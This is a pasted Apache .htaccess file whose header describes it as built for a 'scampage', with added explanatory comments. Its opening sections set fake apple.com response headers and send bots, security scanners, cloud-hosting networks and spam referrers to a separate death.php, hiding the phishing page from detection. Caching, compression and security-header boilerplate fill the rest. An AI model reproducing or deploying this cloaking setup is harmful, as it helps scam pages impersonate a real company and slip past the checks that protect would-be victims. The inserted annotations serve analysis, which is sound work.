d3g1d5

Htaccess Skem

Jul 25th, 2020
  1. #########################################################################
  2. # ULTIMATE .htaccess FILE FOR SCAMPAGE & PERFORMANCE #
  3. #########################################################################
  4. # @Author: DwixRMX #
  5. # @Author URI: https://l34kc0de.today #
  6. # License: GNU General Public License v2 or later #
  7. # License URI: http://www.gnu.org/licenses/gpl-2.0.html #
  8. #########################################################################
  9.  
  10. # DNThirTeen:[CORE]
  11. ServerSignature Off
  12. Options -Indexes
  13. Options -ExecCGI
  14. Options -MultiViews
  15. Options +SymLinksIfOwnerMatch
  16. IndexIgnore *
  17. RewriteEngine On
  18. #AddHandler application/x-httpd-php .dn13 #for custom php extension
  19. RewriteBase /
  20.  
  21. <IfModule mod_headers.c>
      # The Header directive (mod_headers) edits the HTTP response sent back to the
      # visitor. It does not change the client address or the Host that the server
      # records for the incoming request.
      # The names and values below are ones a genuine origin would not send in a
      # response (request-side and proxy header names, an apple.com Server value),
      # so their presence on an unrelated host is a recognizable trait of this template.
      # NOTE(review): whether Apache actually emits the Server/Host values set here
      # depends on the server build and configuration - confirm against a capture.
  22. Header set X_FORWARDED_FOR: 104.16.77.187
  23. Header set REMOTE_ADDR: 104.16.77.187
  24. Header set Server: www.apple.com
  25. Header set Host: www.apple.com
  26. Header set Origin: https://www.apple.com
  27. Header set Referer: https://www.apple.com
  28. Header set X-Forwarded-Host: www.apple.com
  29. Header set X-Forwarded-Proto: https
  30. </IfModule>
  31.  
  32. # DNThirTeen:[USER AGENT]
      # Client filter keyed on the User-Agent request header. A request for anything
      # other than death.php whose User-Agent contains one of the listed names
      # (case-insensitive, [NC]) is internally rewritten to /death.php?log.
      # The matched name is exported as the DN13_USER_AGENT environment variable.
      # death.php is not part of this page, so what it logs or returns is unknown here.
      # For analysis: a client on this list is presumably served something other than
      # the page an ordinary browser receives, so a single automated fetch may not
      # show the real content.
  33. <IfModule mod_rewrite.c>
  34. RewriteEngine On
      # Skip the rule for death.php itself so the rewrite target is not rewritten again.
  35. RewriteCond %{REQUEST_URI} !(death.php) [NC]
  36.  
  37. #list in regex
  38. RewriteCond %{HTTP_USER_AGENT} (360Spider|acapbot|acoonbot|ahrefs|alexibot|asterias|attackbot|backdorbot|suzuran|takeout|teleport|telesoft|true_robots|turingos|turnit|vampire|vikspider|voideye|webleacher|webreaper|webstripper|webvac|webviewer|webwhacker|winhttp|wwwoffle|woxbot|xaldon|xxxyy|yamanalab|yioopbot|youda|zeus|zmeu|zune|zyborg) [NC]
  39.  
  40. RewriteRule .* /death.php?log [L,NE,E=DN13_USER_AGENT:%1]
  41.  
  42. </IfModule>
  43.  
  44. # DNThirTeen:[REMOTE HOST]
      # Client filter keyed on REMOTE_HOST, the client host name as the server knows it.
      # A request for anything other than death.php whose REMOTE_HOST contains one of
      # the listed fragments (case-insensitive, [NC]) is internally rewritten to
      # /death.php?log, with the matched fragment exported as DN13_REMOTE_HOST.
      # Several fragments (amazonaws, colocrossing, softlayer, ...) appear to name
      # hosting and data-centre networks rather than consumer access providers.
      # death.php is not part of this page, so what it logs or returns is unknown here.
  45. <IfModule mod_rewrite.c>
  46. RewriteEngine On
      # Skip the rule for death.php itself so the rewrite target is not rewritten again.
  47. RewriteCond %{REQUEST_URI} !(death.php) [NC]
  48.  
  49. #list in regex
  50. RewriteCond %{REMOTE_HOST} (163data|amazonaws|colocrossing|crimea|g00g1e|justhost|kanagawa|loopia|masterhost|onlinehome|poneytel|sprintdatacenter|reverse.softlayer|safenet|ttnet|woodpecker|wowrack) [NC]
  51.  
  52. RewriteRule .* /death.php?log [L,NE,E=DN13_REMOTE_HOST:%1]
  53.  
  54. </IfModule>
  55.  
  56. # DNThirTeen:[HTTP REFERRER]
      # Client filter keyed on the Referer request header. A request for anything
      # other than death.php whose Referer contains one of the listed keywords
      # (case-insensitive, [NC]) is internally rewritten to /death.php?log, with the
      # matched keyword exported as DN13_HTTP_REFERRER.
      # The keywords are mostly drug and pharmacy-spam terms.
      # death.php is not part of this page, so what it logs or returns is unknown here.
  57. <IfModule mod_rewrite.c>
  58. RewriteEngine On
      # Skip the rule for death.php itself so the rewrite target is not rewritten again.
  59. RewriteCond %{REQUEST_URI} !(death.php) [NC]
  60.  
  61. #list in regex
  62. RewriteCond %{HTTP_REFERER} (ambien|blue\spill|cialis|cocaine|ejaculat|erectile|erections|hoodia|huronriveracres|impotence|levitra|libido|lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby|ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo) [NC]
  63.  
  64. RewriteRule .* /death.php?log [L,NE,E=DN13_HTTP_REFERRER:%1]
  65.  
  66. </IfModule>
  67.  
  68. # DNThirTeen:[MUTATION BLOCKER]
      # Access-control section in Apache 2.2 syntax (Order / Allow / Deny); on 2.4 these
      # directives are provided by mod_access_compat.
      # As written it denies nobody: the only active rule is "Allow from All", and both
      # the Deny line and the RewriteRule are commented out.
      # <Limit> applies only to the methods it names; other methods are not covered by
      # this section.
      # NOTE(review): "#HateCrewDeathRoll" looks like a placeholder where deny entries
      # get written - not confirmable from this page.
  69. <Limit GET HEAD OPTIONS POST PUT>
  70. Order Allow,Deny
  71. #Deny from 127.0.0.1
  72.  
  73. #HateCrewDeathRoll
  74.  
  75. Allow from All
  76. # RewriteRule .* - [F,L]
  77. </Limit>
  78.  
  79. <IfModule mod_rewrite.c>
  80. RewriteEngine On
  81. RewriteCond %{HTTPS} !=on
  82. RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
  83. </IfModule>
  84.  
  85. # ----------------------------------------------------------------------
  86. # | Compressing and Caching |
  87. # ----------------------------------------------------------------------
  88.  
  89. <IfModule mod_expires.c>
  90. ExpiresActive on
  91. ExpiresDefault "access plus 1 month"
  92. # CSS
  93. ExpiresByType text/css "access plus 1 year"
  94. # Data interchange
  95. ExpiresByType application/atom+xml "access plus 1 hour"
  96. ExpiresByType application/rdf+xml "access plus 1 hour"
  97. ExpiresByType application/rss+xml "access plus 1 hour"
  98. ExpiresByType application/json "access plus 0 seconds"
  99. ExpiresByType application/ld+json "access plus 0 seconds"
  100. ExpiresByType application/schema+json "access plus 0 seconds"
  101. ExpiresByType application/vnd.geo+json "access plus 0 seconds"
  102. ExpiresByType application/xml "access plus 0 seconds"
  103. ExpiresByType text/xml "access plus 0 seconds"
  104. # Favicon (cannot be renamed!) and cursor images
  105. ExpiresByType image/vnd.microsoft.icon "access plus 1 week"
  106. ExpiresByType image/x-icon "access plus 1 week"
  107. # HTML - keeps the website in the cache for one hour; new content is only shown once that hour
  108. # has elapsed. If this is not wanted, replace 3600 with zero
  109. ExpiresByType text/html "access plus 3600 seconds"
  110. # JavaScript
  111. ExpiresByType application/javascript "access plus 1 year"
  112. ExpiresByType application/x-javascript "access plus 1 year"
  113. ExpiresByType text/javascript "access plus 1 year"
  114. # Manifest files
  115. ExpiresByType application/manifest+json "access plus 1 week"
  116. ExpiresByType application/x-web-app-manifest+json "access plus 0 seconds"
  117. ExpiresByType text/cache-manifest "access plus 0 seconds"
  118. # Media files
  119. ExpiresByType audio/ogg "access plus 1 month"
  120. ExpiresByType image/bmp "access plus 1 month"
  121. ExpiresByType image/gif "access plus 1 month"
  122. ExpiresByType image/jpeg "access plus 1 month"
  123. ExpiresByType image/png "access plus 1 month"
  124. ExpiresByType image/svg+xml "access plus 1 month"
  125. ExpiresByType image/webp "access plus 1 month"
  126. ExpiresByType video/mp4 "access plus 1 month"
  127. ExpiresByType video/ogg "access plus 1 month"
  128. ExpiresByType video/webm "access plus 1 month"
  129. # Web fonts
  130. # Embedded OpenType (EOT)
  131. ExpiresByType application/vnd.ms-fontobject "access plus 1 month"
  132. ExpiresByType font/eot "access plus 1 month"
  133. # OpenType
  134. ExpiresByType font/opentype "access plus 1 month"
  135. # TrueType
  136. ExpiresByType application/x-font-ttf "access plus 1 month"
  137. # Web Open Font Format (WOFF) 1.0
  138. ExpiresByType application/font-woff "access plus 1 month"
  139. ExpiresByType application/x-font-woff "access plus 1 month"
  140. ExpiresByType font/woff "access plus 1 month"
  141. # Web Open Font Format (WOFF) 2.0
  142. ExpiresByType application/font-woff2 "access plus 1 month"
  143. # Other
  144. ExpiresByType text/x-cross-domain-policy "access plus 1 week"
  145. </IfModule>
  146.  
  147. <IfModule mod_gzip.c>
  148. mod_gzip_on Yes
  149. mod_gzip_dechunk Yes
  150. mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
  151. mod_gzip_item_include handler ^cgi-script$
  152. mod_gzip_item_include mime ^text/.*
  153. mod_gzip_item_include mime ^application/x-javascript.*
  154. mod_gzip_item_exclude mime ^image/.*
  155. mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
  156. </IfModule>
  157.  
  158. <IfModule mod_deflate.c>
  159. # Insert filters / compress text, html, javascript, css, xml:
  160. AddOutputFilterByType DEFLATE text/plain
  161. AddOutputFilterByType DEFLATE text/html
  162. AddOutputFilterByType DEFLATE text/xml
  163. AddOutputFilterByType DEFLATE text/css
  164. AddOutputFilterByType DEFLATE text/vtt
  165. AddOutputFilterByType DEFLATE text/x-component
  166. AddOutputFilterByType DEFLATE application/xml
  167. AddOutputFilterByType DEFLATE application/xhtml+xml
  168. AddOutputFilterByType DEFLATE application/rss+xml
  169. AddOutputFilterByType DEFLATE application/js
  170. AddOutputFilterByType DEFLATE application/javascript
  171. AddOutputFilterByType DEFLATE application/x-javascript
  172. AddOutputFilterByType DEFLATE application/x-httpd-php
  173. AddOutputFilterByType DEFLATE application/x-httpd-fastphp
  174. AddOutputFilterByType DEFLATE application/atom+xml
  175. AddOutputFilterByType DEFLATE application/json
  176. AddOutputFilterByType DEFLATE application/ld+json
  177. AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
  178. AddOutputFilterByType DEFLATE application/x-font-ttf
  179. AddOutputFilterByType DEFLATE application/font-woff2
  180. AddOutputFilterByType DEFLATE application/x-font-woff
  181. AddOutputFilterByType DEFLATE application/x-web-app-manifest+json font/woff
  182. AddOutputFilterByType DEFLATE font/woff
  183. AddOutputFilterByType DEFLATE font/opentype
  184. AddOutputFilterByType DEFLATE image/svg+xml
  185. AddOutputFilterByType DEFLATE image/x-icon
  186.  
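  187. # Exception: images are not compressed. The pattern below also matches .svg, so SVG files requested by that extension are exempt even though image/svg+xml is listed for DEFLATE above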
  188. SetEnvIfNoCase REQUEST_URI \.(?:gif|jpg|jpeg|png|svg)$ no-gzip dont-vary
  189.  
  190. # Drop problematic browsers
  191. BrowserMatch ^Mozilla/4 gzip-only-text/html
  192. BrowserMatch ^Mozilla/4\.0[678] no-gzip
  193. BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
  194.  
  195. # Make sure proxies don't deliver the wrong content
  196. Header append Vary User-Agent env=!dont-vary
  197. </IfModule>
  198.  
  199. #Alternative caching using Apache's "mod_headers", if it's installed.
  200. #Caching of common files - ENABLED
  201. <IfModule mod_headers.c>
  202. <FilesMatch "\.(ico|pdf|flv|swf|js|css|gif|png|jpg|jpeg|txt)$">
  203. Header set Cache-Control "max-age=2592000, public"
  204. </FilesMatch>
  205. </IfModule>
  206.  
  207. <IfModule mod_headers.c>
  208. <FilesMatch "\.(js|css|xml|gz)$">
  209. Header append Vary Accept-Encoding
  210. </FilesMatch>
  211. </IfModule>
  212.  
  213. # Set Keep Alive Header
  214. <IfModule mod_headers.c>
  215. Header set Connection keep-alive
  216. </IfModule>
  217.  
  218. # If your server doesn't support ETags, deactivate them with "None" (and remove the header)
  219. <IfModule mod_expires.c>
  220. <IfModule mod_headers.c>
  221. Header unset ETag
  222. </IfModule>
  223. FileETag None
  224. </IfModule>
  225.  
  226. <IfModule mod_headers.c>
  227. <FilesMatch ".(js|css|xml|gz|html|woff|woff2|ttf)$">
  228. Header append Vary: Accept-Encoding
  229. </FilesMatch>
  230. </IfModule>
  231.  
  232. # -----------------------------------------------------------------------------
  233. # HTTP SECURITY HEADER |
  234. # -----------------------------------------------------------------------------
  235.  
  236. ### @see https://scotthelme.co.uk/hardening-your-http-response-headers
  237. ### UPDATE 2019
  238.  
  239. # drop Range header when more than 5 ranges.
  240. # CVE-2011-3192
  241. SetEnvIf Range (,.*?){5,} bad-range=1
  242. RequestHeader unset Range env=bad-range
  243. # optional logging.
  244. #CustomLog /log common env=bad-range
  245.  
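  246. # LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK. Bytes, 0-2147483647(2GB); 0 means unlimited. The value below is the 2GB maximum, so it restricts very little - choose the smallest size the site needs.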
  247. LimitRequestBody 2147483647
  248.  
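  249. # Don't allow any pages to be framed - defends against clickjacking (framing restrictions do not stop CSRF). This DENY is overridden further down, where X-Frame-Options is set again to "sameorigin".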
  250. Header set X-Frame-Options DENY
  251.  
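  252. # Intended to allow JavaScript only from the same domain and to block inline JavaScript.
  253. # X-Content-Security-Policy with "allow" is an obsolete pre-standard form that current browsers ignore; the standard header is Content-Security-Policy, e.g. "default-src 'self'".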
  254. Header set X-Content-Security-Policy "allow 'self';"
  255.  
  256. ## No-Referrer-Header
  257. <IfModule mod_headers.c>
  258. Header set Referrer-Policy "no-referrer"
  259. </IfModule>
  260.  
  261. ## X-FRAME-OPTIONS-Header
  262. <IfModule mod_headers.c>
  263. Header set X-Frame-Options "sameorigin"
  264. </IfModule>
  265.  
  266. ## X-XSS-PROTECTION-Header
  267. <IfModule mod_headers.c>
  268. Header set X-XSS-Protection "1; mode=block"
  269. </IfModule>
  270.  
  271. ## X-Content-Type-Options-Header
  272. <IfModule mod_headers.c>
  273. Header set X-Content-Type-Options "nosniff"
  274. </IfModule>
  275.  
  276. ## Strict-Transport-Security-Header - only valid when the website is served over https; if it is not, comment this block out. "includeSubDomains; preload" commits every subdomain to https as well.
  277. <IfModule mod_headers.c>
  278. Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
  279. </IfModule>
  280.  
  281. ## This helps prevent mis-issued certificates for this website from being used unnoticed. (Experimental; Expect-CT has since been deprecated by browsers)
  282. ## @see https://tools.ietf.org/html/draft-ietf-httpbis-expect-ct-02
  283. <IfModule mod_headers.c>
  284. Header set Expect-CT "enforce, max-age=21600"
  285. </IfModule>
  286.  
  287. # ----------------------------------------------------------------------
  288. # Webfont access
  289. # ----------------------------------------------------------------------
  290. # Allow access from all domains for webfonts. Alternatively, you could whitelist only your
  291. # subdomains, like "subdomain.example.com".
  292. <IfModule mod_headers.c>
  293. <FilesMatch "\.(ttf|ttc|otf|eot|woff|font.css)$">
  294. Header set Access-Control-Allow-Origin "*"
  295. </FilesMatch>
  296. </IfModule>
  297.  
  298. # ----------------------------------------------------------------------
  299. # Proper MIME type for all files
  300. # ----------------------------------------------------------------------
  301. # JavaScript
  302. # Normalize to standard type (it is sniffed in IE anyways)
  303. # further details: tools.ietf.org/html/rfc4329#section-7.2
  304. AddType application/javascript js jsonp
  305. AddType application/json json
  306. #
  307. # Audio
  308. #
  309. AddType audio/ogg oga ogg
  310. AddType audio/mp4 m4a f4a f4b
  311. #
  312. # Video
  313. #
  314. AddType video/ogg ogv
  315. AddType video/mp4 mp4 m4v f4v f4p
  316. AddType video/webm webm
  317. AddType video/x-flv flv
  318. #
  319. # SVG
  320. # Required for svg webfonts on iPad
  321. # further details: twitter.com/FontSquirrel/status/14855840545
  322. #
  323. AddType image/svg+xml svg svgz
  324. AddEncoding gzip svgz
  325. #
  326. # Webfonts
  327. #
  328. AddType application/vnd.ms-fontobject eot
  329. AddType application/x-font-ttf ttf ttc
  330. AddType font/opentype otf
  331. AddType application/x-font-woff woff
  332. #
  333. # Assorted types
  334. #
  335. AddType image/x-icon ico
  336. AddType image/webp webp
  337. AddType text/cache-manifest appcache manifest
  338. AddType text/x-component htc
  339. AddType application/xml rss atom xml rdf
  340. AddType application/x-chrome-extension crx
  341. AddType application/x-opera-extension oex
  342. AddType application/x-xpinstall xpi
  343. AddType application/octet-stream safariextz
  344. AddType application/x-web-app-manifest+json webapp
  345. AddType text/x-vcard vcf
  346. AddType application/x-shockwave-flash swf
  347. AddType text/vtt vtt
  348.  
  349. # ----------------------------------------------------------------------
  350. # End!
  351. # ----------------------------------------------------------------------